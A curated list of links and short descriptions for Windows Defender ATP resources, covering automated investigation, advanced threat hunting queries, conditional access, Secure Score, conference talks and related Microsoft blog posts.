Windows Defender ATP
Windows Defender ATP Links
Windows Defender ATP Homepage – Homepage for Windows Defender ATP. Also you can start your free trial here.
Video – ATP & WDATP detection sharing – shows how Microsoft 365 Threat Protection shares signals through the Intelligent Security Graph (ISG) to better protect our customers.
Supported Windows Versions
Connectivity Verification Tool – verify client connectivity to WDATP service URLs
Product Area & Features
Automated Investigation & Response – Hexadite
Video – Windows Defender ATP investigation and Response – This animation shows Windows Defender ATP automated investigation and response – how these capability help security teams with their security incidents and how it frees up time for them to do more advanced hunting and strategic work.
Use Automated investigations to investigate and remediate threats
Overview of Automated investigation
Advanced Threat Hunting (Mine data with custom queries)
Getting Started with WDATP Advanced Hunting – Intro to Advanced Threat Hunting article
Using WDATP Advanced Threat Hunting to find powershell scripts that have been executed
Windows Defender ATP Hunting Queries GitHub Repo – This repo contains sample queries for Advanced hunting on Windows Defender Advanced Threat Protection. With these sample queries, you can start to experience Advanced hunting, including the types of data that it covers and the query language it supports. You can also explore a variety of attack techniques and how they may be surfaced through Advanced hunting.
How to query Advanced Threat Hunting for ASR Rules
Kusto Query Language Reference Documentation – Learn how to write advanced hunting queries using this reference guide
M365 Conditional Access based on device-risk with Windows Defender ATP – This video shows how the machine risk level constantly evaluated by WDATP is being used with conditional access. Microsoft Intune will receive the device risk level from Windows Defender ATP and CA will block access to business applications if the value is not conform with company policies.
Windows Defender ATP Secure Score – This animation vide shows Windows Secure Score – how it helps organizations to stay more secure, PowerBI reports to easily looks for CVE’s and how our new Emergency Outbreak Updates get pushed automatically. (The video has references to the new “Microsoft Secure Score” and “emergency outbreak updates” which have not been disclosed yet.)
3rd party integration
Ziften Demo with WDATP – In less than 3 minutes Ziften CPO Mike Hamilton demonstrates the Dynoroot Vulnerability Exploit as well as a quick demo of the advanced hunting feature in the Microsoft Windows Defender ATP advanced hunting feature set.
Various conference and Windows Defender ATP Videos
Windows Defender ATP – Unified platform for endpoint security, RSA Conference 2018
Taking Ransomware to task with Windows Defender ATP, RSA Conference 2018
Windows Defender ATP Machine Learning: Detecting new and unusual breach activity, Ignite Sep-2017
Windows Defender ATP Lessons from the Field, TechReady 02-2017
Related Blog Articles
Hunting tip of the month: Downloads originating from email links – 08/30/2018 – In this August post, we are going to build on top of that and discuss more complex queries that join several noisy signals into stronger signals that you can use to hunt.
Protecting Windows Servers with Windows Defender ATP – This blog is for enterprise customers who want to use the Windows Defender ATP platform on Windows Server and need practical guidance on what needs to be in place for licensing and infrastructure.
Windows 10 to offer application developers new malware defenses – Application developers can now actively participate in malware defense – in a new way to help protect customers from dynamic script-based malware and non-traditional avenues of cyberattack.
Windows Defender ATP integrates with Microsoft Information Protection to discover, protect, and monitor sensitive data on Windows devices – by integrating with Azure Information Protection, Microsoft’s data classification, labeling, and protection solution. This integration empowers Windows to natively understand Azure Information Protection sensitivity labels, to provide visibility into sensitive data on endpoints, to protect sensitive data based on its content, and to detect and respond to post-breach malicious activity that involves or affects sensitive data
WDATP API “Hello World” (using a simple powershell script to pull alerts via WDATP API) – we will walk you through common automation scenarios that you can achieve with Windows Defender ATP to optimize workflows